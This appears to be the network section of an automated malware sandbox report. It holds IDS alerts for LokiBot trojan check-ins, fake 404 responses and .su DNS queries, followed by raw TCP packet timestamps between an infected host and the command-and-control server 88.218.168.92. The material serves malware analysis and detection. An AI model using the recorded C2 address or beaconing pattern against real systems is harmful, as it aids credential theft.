                        05/04/22-17:06:36.675434 05/04/22-17:06:36.675434TCP2025483ET TROJAN LokiBot Fake 404 Response804979088.218.168.92192.168.2.4
                        05/04/22-17:07:15.612334 05/04/22-17:07:15.612334TCP2025483ET TROJAN LokiBot Fake 404 Response804981088.218.168.92192.168.2.4
                        05/04/22-17:07:18.596983 05/04/22-17:07:18.596983TCP2025483ET TROJAN LokiBot Fake 404 Response804981288.218.168.92192.168.2.4
                        05/04/22-17:07:36.027149 05/04/22-17:07:36.027149UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6094653192.168.2.48.8.8.8
                        05/04/22-17:06:19.592402 05/04/22-17:06:19.592402TCP2825766ETPRO TROJAN LokiBot Checkin M24978280192.168.2.488.218.168.92
                        05/04/22-17:05:58.351855 05/04/22-17:05:58.351855UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6490953192.168.2.48.8.8.8
                        05/04/22-17:07:05.007163 05/04/22-17:07:05.007163TCP2025483ET TROJAN LokiBot Fake 404 Response804980188.218.168.92192.168.2.4
                        05/04/22-17:05:56.623177 05/04/22-17:05:56.623177TCP2825766ETPRO TROJAN LokiBot Checkin M24976580192.168.2.488.218.168.92
                        05/04/22-17:06:31.742972 05/04/22-17:06:31.742972TCP2025483ET TROJAN LokiBot Fake 404 Response804978788.218.168.92192.168.2.4
                        05/04/22-17:06:40.198897 05/04/22-17:06:40.198897TCP2825766ETPRO TROJAN LokiBot Checkin M24979280192.168.2.488.218.168.92
                        05/04/22-17:05:58.579153 05/04/22-17:05:58.579153TCP2825766ETPRO TROJAN LokiBot Checkin M24976780192.168.2.488.218.168.92
                        05/04/22-17:07:18.109794 05/04/22-17:07:18.109794UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6106853192.168.2.48.8.8.8
                        05/04/22-17:05:53.764676 05/04/22-17:05:53.764676UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6075853192.168.2.48.8.8.8
                        05/04/22-17:06:34.682087 05/04/22-17:06:34.682087UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5398953192.168.2.48.8.8.8
                        05/04/22-17:05:57.102046 05/04/22-17:05:57.102046TCP2025483ET TROJAN LokiBot Fake 404 Response804976588.218.168.92192.168.2.4
                        05/04/22-17:06:21.587324 05/04/22-17:06:21.587324TCP2025483ET TROJAN LokiBot Fake 404 Response804978388.218.168.92192.168.2.4
                        05/04/22-17:07:00.547757 05/04/22-17:07:00.547757TCP2025483ET TROJAN LokiBot Fake 404 Response804980088.218.168.92192.168.2.4
                        05/04/22-17:06:19.530815 05/04/22-17:06:19.530815UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5247253192.168.2.48.8.8.8
                        05/04/22-17:06:46.019049 05/04/22-17:06:46.019049TCP2825766ETPRO TROJAN LokiBot Checkin M24979380192.168.2.488.218.168.92
                        05/04/22-17:06:54.136918 05/04/22-17:06:54.136918UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5077853192.168.2.48.8.8.8
                        05/04/22-17:06:13.754758 05/04/22-17:06:13.754758TCP2025483ET TROJAN LokiBot Fake 404 Response804977988.218.168.92192.168.2.4
                        05/04/22-17:05:53.814873 05/04/22-17:05:53.814873TCP2825766ETPRO TROJAN LokiBot Checkin M24976480192.168.2.488.218.168.92
                        05/04/22-17:05:56.551066 05/04/22-17:05:56.551066UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6064753192.168.2.48.8.8.8
                        05/04/22-17:06:58.254969 05/04/22-17:06:58.254969TCP2025483ET TROJAN LokiBot Fake 404 Response804979988.218.168.92192.168.2.4
                        05/04/22-17:06:03.517854 05/04/22-17:06:03.517854UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5406953192.168.2.48.8.8.8
                        05/04/22-17:06:29.614717 05/04/22-17:06:29.614717TCP2025483ET TROJAN LokiBot Fake 404 Response804978688.218.168.92192.168.2.4
                        05/04/22-17:07:32.582866 05/04/22-17:07:32.582866TCP2825766ETPRO TROJAN LokiBot Checkin M24981880192.168.2.488.218.168.92
                        05/04/22-17:06:29.050171 05/04/22-17:06:29.050171UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5881653192.168.2.48.8.8.8
                        05/04/22-17:06:51.541781 05/04/22-17:06:51.541781TCP2025483ET TROJAN LokiBot Fake 404 Response804979788.218.168.92192.168.2.4
                        05/04/22-17:06:18.577427 05/04/22-17:06:18.577427TCP2025483ET TROJAN LokiBot Fake 404 Response804978188.218.168.92192.168.2.4
                        05/04/22-17:06:01.883215 05/04/22-17:06:01.883215TCP2025483ET TROJAN LokiBot Fake 404 Response804976988.218.168.92192.168.2.4
                        05/04/22-17:05:43.139332 05/04/22-17:05:43.139332TCP2825766ETPRO TROJAN LokiBot Checkin M24975880192.168.2.488.218.168.92
                        05/04/22-17:07:20.576478 05/04/22-17:07:20.576478UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5871553192.168.2.48.8.8.8
                        05/04/22-17:06:47.446849 05/04/22-17:06:47.446849UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6108153192.168.2.48.8.8.8
                        05/04/22-17:06:27.621610 05/04/22-17:06:27.621610TCP2025483ET TROJAN LokiBot Fake 404 Response804978588.218.168.92192.168.2.4
                        05/04/22-17:06:38.277875 05/04/22-17:06:38.277875TCP2825766ETPRO TROJAN LokiBot Checkin M24979180192.168.2.488.218.168.92
                        05/04/22-17:07:29.254760 05/04/22-17:07:29.254760TCP2825766ETPRO TROJAN LokiBot Checkin M24981680192.168.2.488.218.168.92
                        05/04/22-17:07:08.472306 05/04/22-17:07:08.472306UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6494853192.168.2.48.8.8.8
                        05/04/22-17:06:09.618553 05/04/22-17:06:09.618553TCP2025483ET TROJAN LokiBot Fake 404 Response804977788.218.168.92192.168.2.4
                        05/04/22-17:07:06.183458 05/04/22-17:07:06.183458TCP2825766ETPRO TROJAN LokiBot Checkin M24980280192.168.2.488.218.168.92
                        05/04/22-17:06:23.295314 05/04/22-17:06:23.295314TCP2025483ET TROJAN LokiBot Fake 404 Response804978488.218.168.92192.168.2.4
                        05/04/22-17:05:52.472200 05/04/22-17:05:52.472200TCP2025483ET TROJAN LokiBot Fake 404 Response804976288.218.168.92192.168.2.4
                        05/04/22-17:07:06.131413 05/04/22-17:07:06.131413UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5514253192.168.2.48.8.8.8
                        05/04/22-17:07:12.890174 05/04/22-17:07:12.890174TCP2025483ET TROJAN LokiBot Fake 404 Response804980988.218.168.92192.168.2.4
                        05/04/22-17:07:36.607784 05/04/22-17:07:36.607784TCP2025483ET TROJAN LokiBot Fake 404 Response804982088.218.168.92192.168.2.4
                        05/04/22-17:06:13.256202 05/04/22-17:06:13.256202UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6136153192.168.2.48.8.8.8
                        05/04/22-17:06:36.219078 05/04/22-17:06:36.219078UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6343153192.168.2.48.8.8.8
                        05/04/22-17:07:34.907867 05/04/22-17:07:34.907867UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6270853192.168.2.48.8.8.8
                        05/04/22-17:06:34.736743 05/04/22-17:06:34.736743TCP2825766ETPRO TROJAN LokiBot Checkin M24978980192.168.2.488.218.168.92
                        05/04/22-17:07:26.831839 05/04/22-17:07:26.831839TCP2025483ET TROJAN LokiBot Fake 404 Response804981588.218.168.92192.168.2.4
                        05/04/22-17:07:20.640279 05/04/22-17:07:20.640279TCP2825766ETPRO TROJAN LokiBot Checkin M24981380192.168.2.488.218.168.92
                        05/04/22-17:06:27.214704 05/04/22-17:06:27.214704UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6061253192.168.2.48.8.8.8
                        05/04/22-17:06:38.226151 05/04/22-17:06:38.226151UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5690153192.168.2.48.8.8.8
                        05/04/22-17:07:33.087141 05/04/22-17:07:33.087141TCP2025483ET TROJAN LokiBot Fake 404 Response804981888.218.168.92192.168.2.4
                        05/04/22-17:05:59.063198 05/04/22-17:05:59.063198TCP2025483ET TROJAN LokiBot Fake 404 Response804976788.218.168.92192.168.2.4
                        05/04/22-17:06:20.073584 05/04/22-17:06:20.073584TCP2025483ET TROJAN LokiBot Fake 404 Response804978288.218.168.92192.168.2.4
                        05/04/22-17:06:54.199564 05/04/22-17:06:54.199564TCP2825766ETPRO TROJAN LokiBot Checkin M24979880192.168.2.488.218.168.92
                        05/04/22-17:07:29.679426 05/04/22-17:07:29.679426TCP2025483ET TROJAN LokiBot Fake 404 Response804981688.218.168.92192.168.2.4
                        05/04/22-17:07:12.448957 05/04/22-17:07:12.448957TCP2825766ETPRO TROJAN LokiBot Checkin M24980980192.168.2.488.218.168.92
                        05/04/22-17:07:00.180937 05/04/22-17:07:00.180937TCP2825766ETPRO TROJAN LokiBot Checkin M24980080192.168.2.488.218.168.92
                        05/04/22-17:07:00.131351 05/04/22-17:07:00.131351UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6149753192.168.2.48.8.8.8
                        05/04/22-17:06:13.307202 05/04/22-17:06:13.307202TCP2825766ETPRO TROJAN LokiBot Checkin M24977980192.168.2.488.218.168.92
                        05/04/22-17:05:50.113938 05/04/22-17:05:50.113938UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6427753192.168.2.48.8.8.8
                        05/04/22-17:07:04.517653 05/04/22-17:07:04.517653UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5789053192.168.2.48.8.8.8
                        05/04/22-17:06:32.814891 05/04/22-17:06:32.814891UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6482553192.168.2.48.8.8.8
                        05/04/22-17:07:12.396863 05/04/22-17:07:12.396863UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6041853192.168.2.48.8.8.8
                        05/04/22-17:06:47.985481 05/04/22-17:06:47.985481TCP2025483ET TROJAN LokiBot Fake 404 Response804979488.218.168.92192.168.2.4
                        05/04/22-17:06:11.039758 05/04/22-17:06:11.039758TCP2825766ETPRO TROJAN LokiBot Checkin M24977880192.168.2.488.218.168.92
                        05/04/22-17:06:31.242187 05/04/22-17:06:31.242187UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5643753192.168.2.48.8.8.8
                        05/04/22-17:07:06.643095 05/04/22-17:07:06.643095TCP2025483ET TROJAN LokiBot Fake 404 Response804980288.218.168.92192.168.2.4
                        05/04/22-17:06:27.338928 05/04/22-17:06:27.338928TCP2825766ETPRO TROJAN LokiBot Checkin M24978580192.168.2.488.218.168.92
                        05/04/22-17:05:50.684991 05/04/22-17:05:50.684991TCP2025483ET TROJAN LokiBot Fake 404 Response804976188.218.168.92192.168.2.4
                        05/04/22-17:06:33.611126 05/04/22-17:06:33.611126TCP2025483ET TROJAN LokiBot Fake 404 Response804978888.218.168.92192.168.2.4
                        05/04/22-17:06:21.093407 05/04/22-17:06:21.093407UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6235453192.168.2.48.8.8.8
                        05/04/22-17:06:40.145922 05/04/22-17:06:40.145922UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5080053192.168.2.48.8.8.8
                        05/04/22-17:06:09.141152 05/04/22-17:06:09.141152TCP2825766ETPRO TROJAN LokiBot Checkin M24977780192.168.2.488.218.168.92
                        05/04/22-17:07:36.164319 05/04/22-17:07:36.164319TCP2825766ETPRO TROJAN LokiBot Checkin M24982080192.168.2.488.218.168.92
                        05/04/22-17:07:08.526354 05/04/22-17:07:08.526354TCP2825766ETPRO TROJAN LokiBot Checkin M24980880192.168.2.488.218.168.92
                        05/04/22-17:07:24.388512 05/04/22-17:07:24.388512UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5781653192.168.2.48.8.8.8
                        05/04/22-17:06:01.382015 05/04/22-17:06:01.382015UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5650953192.168.2.48.8.8.8
                        05/04/22-17:05:54.312280 05/04/22-17:05:54.312280TCP2025483ET TROJAN LokiBot Fake 404 Response804976488.218.168.92192.168.2.4
                        05/04/22-17:06:15.931925 05/04/22-17:06:15.931925TCP2825766ETPRO TROJAN LokiBot Checkin M24978080192.168.2.488.218.168.92
                        05/04/22-17:07:15.184930 05/04/22-17:07:15.184930UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6425953192.168.2.48.8.8.8
                        05/04/22-17:06:57.664119 05/04/22-17:06:57.664119UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6148653192.168.2.48.8.8.8
                        05/04/22-17:06:33.132721 05/04/22-17:06:33.132721TCP2825766ETPRO TROJAN LokiBot Checkin M24978880192.168.2.488.218.168.92
                        05/04/22-17:07:29.203285 05/04/22-17:07:29.203285UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5391653192.168.2.48.8.8.8
                        05/04/22-17:06:57.725161 05/04/22-17:06:57.725161TCP2825766ETPRO TROJAN LokiBot Checkin M24979980192.168.2.488.218.168.92
                        05/04/22-17:05:42.799347 05/04/22-17:05:42.799347UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5480053192.168.2.48.8.8.8
                        05/04/22-17:06:54.742448 05/04/22-17:06:54.742448TCP2025483ET TROJAN LokiBot Fake 404 Response804979888.218.168.92192.168.2.4
                        05/04/22-17:06:21.151210 05/04/22-17:06:21.151210TCP2825766ETPRO TROJAN LokiBot Checkin M24978380192.168.2.488.218.168.92
                        05/04/22-17:06:51.121383 05/04/22-17:06:51.121383TCP2825766ETPRO TROJAN LokiBot Checkin M24979780192.168.2.488.218.168.92
                        05/04/22-17:06:36.270568 05/04/22-17:06:36.270568TCP2825766ETPRO TROJAN LokiBot Checkin M24979080192.168.2.488.218.168.92
                        05/04/22-17:06:35.234500 05/04/22-17:06:35.234500TCP2025483ET TROJAN LokiBot Fake 404 Response804978988.218.168.92192.168.2.4
                        05/04/22-17:06:47.499153 05/04/22-17:06:47.499153TCP2825766ETPRO TROJAN LokiBot Checkin M24979480192.168.2.488.218.168.92
                        05/04/22-17:05:55.553795 05/04/22-17:05:55.553795UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6064753192.168.2.48.8.8.8
                        05/04/22-17:06:01.435904 05/04/22-17:06:01.435904TCP2825766ETPRO TROJAN LokiBot Checkin M24976980192.168.2.488.218.168.92
                        05/04/22-17:06:29.101313 05/04/22-17:06:29.101313TCP2825766ETPRO TROJAN LokiBot Checkin M24978680192.168.2.488.218.168.92
                        05/04/22-17:06:18.108508 05/04/22-17:06:18.108508UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5167953192.168.2.48.8.8.8
                        05/04/22-17:07:35.421031 05/04/22-17:07:35.421031TCP2025483ET TROJAN LokiBot Fake 404 Response804981988.218.168.92192.168.2.4
                        05/04/22-17:05:51.787319 05/04/22-17:05:51.787319UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5607653192.168.2.48.8.8.8
                        05/04/22-17:06:03.992034 05/04/22-17:06:03.992034TCP2025483ET TROJAN LokiBot Fake 404 Response804977188.218.168.92192.168.2.4
                        05/04/22-17:07:09.009329 05/04/22-17:07:09.009329TCP2025483ET TROJAN LokiBot Fake 404 Response804980888.218.168.92192.168.2.4
                        05/04/22-17:06:22.836617 05/04/22-17:06:22.836617UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5006153192.168.2.48.8.8.8
                        05/04/22-17:06:38.732588 05/04/22-17:06:38.732588TCP2025483ET TROJAN LokiBot Fake 404 Response804979188.218.168.92192.168.2.4
                        05/04/22-17:06:40.593792 05/04/22-17:06:40.593792TCP2025483ET TROJAN LokiBot Fake 404 Response804979288.218.168.92192.168.2.4
                        05/04/22-17:06:45.966592 05/04/22-17:06:45.966592UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5225653192.168.2.48.8.8.8
                        05/04/22-17:06:50.800947 05/04/22-17:06:50.800947UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6371253192.168.2.48.8.8.8
                        05/04/22-17:05:46.100520 05/04/22-17:05:46.100520UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6445453192.168.2.48.8.8.8
                        TimestampSource PortDest PortSource IPDest IP
                        May 4, 2022 17:05:43.107356071 CEST4975880192.168.2.488.218.168.92
                        May 4, 2022 17:05:43.135206938 CEST804975888.218.168.92192.168.2.4
                        May 4, 2022 17:05:43.135324001 CEST4975880192.168.2.488.218.168.92
                        May 4, 2022 17:05:43.139332056 CEST4975880192.168.2.488.218.168.92
                        May 4, 2022 17:05:43.166277885 CEST804975888.218.168.92192.168.2.4
                        May 4, 2022 17:05:43.166413069 CEST4975880192.168.2.488.218.168.92
                        May 4, 2022 17:05:43.193197966 CEST804975888.218.168.92192.168.2.4
                        May 4, 2022 17:05:43.679094076 CEST804975888.218.168.92192.168.2.4
                        May 4, 2022 17:05:43.679269075 CEST4975880192.168.2.488.218.168.92
                        May 4, 2022 17:05:43.681265116 CEST4975880192.168.2.488.218.168.92
                        May 4, 2022 17:05:43.708215952 CEST804975888.218.168.92192.168.2.4
                        May 4, 2022 17:05:46.290865898 CEST4975980192.168.2.488.218.168.92
                        May 4, 2022 17:05:46.317907095 CEST804975988.218.168.92192.168.2.4
                        May 4, 2022 17:05:46.318145990 CEST4975980192.168.2.488.218.168.92
                        May 4, 2022 17:05:46.967262983 CEST4975980192.168.2.488.218.168.92
                        May 4, 2022 17:05:46.996504068 CEST804975988.218.168.92192.168.2.4
                        May 4, 2022 17:05:46.996737957 CEST4975980192.168.2.488.218.168.92
                        May 4, 2022 17:05:47.023848057 CEST804975988.218.168.92192.168.2.4
                        May 4, 2022 17:05:47.694180965 CEST804975988.218.168.92192.168.2.4
                        May 4, 2022 17:05:47.694360971 CEST4975980192.168.2.488.218.168.92
                        May 4, 2022 17:05:47.717003107 CEST4975980192.168.2.488.218.168.92
                        May 4, 2022 17:05:47.744468927 CEST804975988.218.168.92192.168.2.4
                        May 4, 2022 17:05:50.191690922 CEST4976180192.168.2.488.218.168.92
                        May 4, 2022 17:05:50.218523026 CEST804976188.218.168.92192.168.2.4
                        May 4, 2022 17:05:50.218703032 CEST4976180192.168.2.488.218.168.92
                        May 4, 2022 17:05:50.222184896 CEST4976180192.168.2.488.218.168.92
                        May 4, 2022 17:05:50.248764038 CEST804976188.218.168.92192.168.2.4
                        May 4, 2022 17:05:50.248879910 CEST4976180192.168.2.488.218.168.92
                        May 4, 2022 17:05:50.275520086 CEST804976188.218.168.92192.168.2.4
                        May 4, 2022 17:05:50.684990883 CEST804976188.218.168.92192.168.2.4
                        May 4, 2022 17:05:50.685149908 CEST4976180192.168.2.488.218.168.92
                        May 4, 2022 17:05:50.685218096 CEST4976180192.168.2.488.218.168.92
                        May 4, 2022 17:05:50.714595079 CEST804976188.218.168.92192.168.2.4
                        May 4, 2022 17:05:51.898881912 CEST4976280192.168.2.488.218.168.92
                        May 4, 2022 17:05:51.927212000 CEST804976288.218.168.92192.168.2.4
                        May 4, 2022 17:05:51.927419901 CEST4976280192.168.2.488.218.168.92
                        May 4, 2022 17:05:51.935858011 CEST4976280192.168.2.488.218.168.92
                        May 4, 2022 17:05:51.963226080 CEST804976288.218.168.92192.168.2.4
                        May 4, 2022 17:05:51.963324070 CEST4976280192.168.2.488.218.168.92
                        May 4, 2022 17:05:51.990365982 CEST804976288.218.168.92192.168.2.4
                        May 4, 2022 17:05:52.472199917 CEST804976288.218.168.92192.168.2.4
                        May 4, 2022 17:05:52.472383022 CEST4976280192.168.2.488.218.168.92
                        May 4, 2022 17:05:52.472863913 CEST4976280192.168.2.488.218.168.92
                        May 4, 2022 17:05:52.499671936 CEST804976288.218.168.92192.168.2.4
                        May 4, 2022 17:05:53.784216881 CEST4976480192.168.2.488.218.168.92
                        May 4, 2022 17:05:53.810920954 CEST804976488.218.168.92192.168.2.4
                        May 4, 2022 17:05:53.811038017 CEST4976480192.168.2.488.218.168.92
                        May 4, 2022 17:05:53.814872980 CEST4976480192.168.2.488.218.168.92
                        May 4, 2022 17:05:53.843272924 CEST804976488.218.168.92192.168.2.4
                        May 4, 2022 17:05:53.843362093 CEST4976480192.168.2.488.218.168.92
                        May 4, 2022 17:05:53.873492956 CEST804976488.218.168.92192.168.2.4
                        May 4, 2022 17:05:54.312279940 CEST804976488.218.168.92192.168.2.4
                        May 4, 2022 17:05:54.312387943 CEST4976480192.168.2.488.218.168.92
                        May 4, 2022 17:05:54.312465906 CEST4976480192.168.2.488.218.168.92
                        May 4, 2022 17:05:54.339440107 CEST804976488.218.168.92192.168.2.4
                        May 4, 2022 17:05:56.582315922 CEST4976580192.168.2.488.218.168.92
                        May 4, 2022 17:05:56.610655069 CEST804976588.218.168.92192.168.2.4
                        May 4, 2022 17:05:56.610877037 CEST4976580192.168.2.488.218.168.92
                        May 4, 2022 17:05:56.623177052 CEST4976580192.168.2.488.218.168.92
                        May 4, 2022 17:05:56.650547028 CEST804976588.218.168.92192.168.2.4
                        May 4, 2022 17:05:56.650676966 CEST4976580192.168.2.488.218.168.92
                        May 4, 2022 17:05:56.677556992 CEST804976588.218.168.92192.168.2.4
                        May 4, 2022 17:05:57.102046013 CEST804976588.218.168.92192.168.2.4
                        May 4, 2022 17:05:57.102140903 CEST4976580192.168.2.488.218.168.92
                        May 4, 2022 17:05:57.102181911 CEST4976580192.168.2.488.218.168.92
                        May 4, 2022 17:05:57.130877972 CEST804976588.218.168.92192.168.2.4
                        May 4, 2022 17:05:58.468138933 CEST4976780192.168.2.488.218.168.92
                        May 4, 2022 17:05:58.495294094 CEST804976788.218.168.92192.168.2.4
                        May 4, 2022 17:05:58.495503902 CEST4976780192.168.2.488.218.168.92
                        May 4, 2022 17:05:58.579153061 CEST4976780192.168.2.488.218.168.92
                        May 4, 2022 17:05:58.606280088 CEST804976788.218.168.92192.168.2.4
                        May 4, 2022 17:05:58.606503963 CEST4976780192.168.2.488.218.168.92
                        May 4, 2022 17:05:58.633599997 CEST804976788.218.168.92192.168.2.4
                        May 4, 2022 17:05:59.063198090 CEST804976788.218.168.92192.168.2.4
                        May 4, 2022 17:05:59.063340902 CEST4976780192.168.2.488.218.168.92
                        May 4, 2022 17:05:59.063400984 CEST4976780192.168.2.488.218.168.92
                        May 4, 2022 17:05:59.090226889 CEST804976788.218.168.92192.168.2.4
                        May 4, 2022 17:06:01.404460907 CEST4976980192.168.2.488.218.168.92
                        May 4, 2022 17:06:01.431648016 CEST804976988.218.168.92192.168.2.4
                        May 4, 2022 17:06:01.431814909 CEST4976980192.168.2.488.218.168.92
                        May 4, 2022 17:06:01.435904026 CEST4976980192.168.2.488.218.168.92
                        May 4, 2022 17:06:01.462898016 CEST804976988.218.168.92192.168.2.4
                        May 4, 2022 17:06:01.462996006 CEST4976980192.168.2.488.218.168.92
                        May 4, 2022 17:06:01.489851952 CEST804976988.218.168.92192.168.2.4
                        May 4, 2022 17:06:01.883214951 CEST804976988.218.168.92192.168.2.4
                        May 4, 2022 17:06:01.883327007 CEST4976980192.168.2.488.218.168.92
                        May 4, 2022 17:06:01.883389950 CEST4976980192.168.2.488.218.168.92
                        May 4, 2022 17:06:01.910387039 CEST804976988.218.168.92192.168.2.4
                        May 4, 2022 17:06:03.544411898 CEST4977180192.168.2.488.218.168.92
                        May 4, 2022 17:06:03.571821928 CEST804977188.218.168.92192.168.2.4
                        May 4, 2022 17:06:03.571943998 CEST4977180192.168.2.488.218.168.92
                        May 4, 2022 17:06:03.575680971 CEST4977180192.168.2.488.218.168.92
                        May 4, 2022 17:06:03.602577925 CEST804977188.218.168.92192.168.2.4
                        May 4, 2022 17:06:03.602721930 CEST4977180192.168.2.488.218.168.92
                        May 4, 2022 17:06:03.629604101 CEST804977188.218.168.92192.168.2.4
                        May 4, 2022 17:06:03.992033958 CEST804977188.218.168.92192.168.2.4
                        May 4, 2022 17:06:03.992160082 CEST4977180192.168.2.488.218.168.92
                        May 4, 2022 17:06:03.992193937 CEST4977180192.168.2.488.218.168.92
                        May 4, 2022 17:06:04.018841028 CEST804977188.218.168.92192.168.2.4
                        May 4, 2022 17:06:09.109447002 CEST4977780192.168.2.488.218.168.92
                        May 4, 2022 17:06:09.136583090 CEST804977788.218.168.92192.168.2.4
                        May 4, 2022 17:06:09.138660908 CEST4977780192.168.2.488.218.168.92
                        May 4, 2022 17:06:09.141151905 CEST4977780192.168.2.488.218.168.92
                        May 4, 2022 17:06:09.168275118 CEST804977788.218.168.92192.168.2.4
                        May 4, 2022 17:06:09.168397903 CEST4977780192.168.2.488.218.168.92
                        May 4, 2022 17:06:09.195816994 CEST804977788.218.168.92192.168.2.4
                        May 4, 2022 17:06:09.618552923 CEST804977788.218.168.92192.168.2.4
                        May 4, 2022 17:06:09.618812084 CEST4977780192.168.2.488.218.168.92
                        May 4, 2022 17:06:09.618957043 CEST4977780192.168.2.488.218.168.92
                        May 4, 2022 17:06:09.645687103 CEST804977788.218.168.92192.168.2.4
                        May 4, 2022 17:06:11.003859043 CEST4977880192.168.2.488.218.168.92
                        May 4, 2022 17:06:11.035821915 CEST804977888.218.168.92192.168.2.4
                        May 4, 2022 17:06:11.036027908 CEST4977880192.168.2.488.218.168.92
                        May 4, 2022 17:06:11.039757967 CEST4977880192.168.2.488.218.168.92
                        May 4, 2022 17:06:11.066376925 CEST804977888.218.168.92192.168.2.4
                        May 4, 2022 17:06:11.066473961 CEST4977880192.168.2.488.218.168.92
                        May 4, 2022 17:06:11.092971087 CEST804977888.218.168.92192.168.2.4
                        May 4, 2022 17:06:11.460186005 CEST804977888.218.168.92192.168.2.4
                        May 4, 2022 17:06:11.460294962 CEST4977880192.168.2.488.218.168.92
                        May 4, 2022 17:06:11.460339069 CEST4977880192.168.2.488.218.168.92
                        May 4, 2022 17:06:11.486809969 CEST804977888.218.168.92192.168.2.4
                        May 4, 2022 17:06:13.276364088 CEST4977980192.168.2.488.218.168.92
                        May 4, 2022 17:06:13.303169966 CEST804977988.218.168.92192.168.2.4
                        May 4, 2022 17:06:13.303385019 CEST4977980192.168.2.488.218.168.92
                        May 4, 2022 17:06:13.307202101 CEST4977980192.168.2.488.218.168.92
                        May 4, 2022 17:06:13.334706068 CEST804977988.218.168.92192.168.2.4
                        May 4, 2022 17:06:13.337049007 CEST4977980192.168.2.488.218.168.92
                        May 4, 2022 17:06:13.363816023 CEST804977988.218.168.92192.168.2.4
                        May 4, 2022 17:06:13.754757881 CEST804977988.218.168.92192.168.2.4
                        May 4, 2022 17:06:13.754898071 CEST4977980192.168.2.488.218.168.92
                        May 4, 2022 17:06:13.754931927 CEST4977980192.168.2.488.218.168.92
                        May 4, 2022 17:06:13.781995058 CEST804977988.218.168.92192.168.2.4
                        May 4, 2022 17:06:15.901490927 CEST4978080192.168.2.488.218.168.92
                        May 4, 2022 17:06:15.928452969 CEST804978088.218.168.92192.168.2.4
                        May 4, 2022 17:06:15.928720951 CEST4978080192.168.2.488.218.168.92
                        May 4, 2022 17:06:15.931925058 CEST4978080192.168.2.488.218.168.92
                        May 4, 2022 17:06:15.958833933 CEST804978088.218.168.92192.168.2.4
                        May 4, 2022 17:06:15.959577084 CEST4978080192.168.2.488.218.168.92
                        May 4, 2022 17:06:15.986562014 CEST804978088.218.168.92192.168.2.4
                        May 4, 2022 17:06:16.374113083 CEST804978088.218.168.92192.168.2.4
                        May 4, 2022 17:06:16.374488115 CEST4978080192.168.2.488.218.168.92
                        May 4, 2022 17:06:16.374562979 CEST4978080192.168.2.488.218.168.92
                        May 4, 2022 17:06:16.401628017 CEST804978088.218.168.92192.168.2.4
                        May 4, 2022 17:06:18.128567934 CEST4978180192.168.2.488.218.168.92
                        May 4, 2022 17:06:18.156313896 CEST804978188.218.168.92192.168.2.4
                        May 4, 2022 17:06:18.157397032 CEST4978180192.168.2.488.218.168.92
                        May 4, 2022 17:06:18.169397116 CEST4978180192.168.2.488.218.168.92
                        May 4, 2022 17:06:18.196248055 CEST804978188.218.168.92192.168.2.4
                        May 4, 2022 17:06:18.196454048 CEST4978180192.168.2.488.218.168.92
                        May 4, 2022 17:06:18.223114014 CEST804978188.218.168.92192.168.2.4
                        May 4, 2022 17:06:18.577426910 CEST804978188.218.168.92192.168.2.4
                        May 4, 2022 17:06:18.577601910 CEST4978180192.168.2.488.218.168.92
                        May 4, 2022 17:06:18.577641964 CEST4978180192.168.2.488.218.168.92
                        May 4, 2022 17:06:18.606632948 CEST804978188.218.168.92192.168.2.4
                        May 4, 2022 17:06:19.561182976 CEST4978280192.168.2.488.218.168.92
                        May 4, 2022 17:06:19.588170052 CEST804978288.218.168.92192.168.2.4
                        May 4, 2022 17:06:19.588352919 CEST4978280192.168.2.488.218.168.92
                        May 4, 2022 17:06:19.592401981 CEST4978280192.168.2.488.218.168.92
                        May 4, 2022 17:06:19.619316101 CEST804978288.218.168.92192.168.2.4
                        May 4, 2022 17:06:19.619504929 CEST4978280192.168.2.488.218.168.92
                        May 4, 2022 17:06:19.646605015 CEST804978288.218.168.92192.168.2.4
                        May 4, 2022 17:06:20.073584080 CEST804978288.218.168.92192.168.2.4
                        May 4, 2022 17:06:20.077734947 CEST4978280192.168.2.488.218.168.92
                        May 4, 2022 17:06:20.077769995 CEST4978280192.168.2.488.218.168.92
                        May 4, 2022 17:06:20.104659081 CEST804978288.218.168.92192.168.2.4
                        May 4, 2022 17:06:21.113238096 CEST4978380192.168.2.488.218.168.92
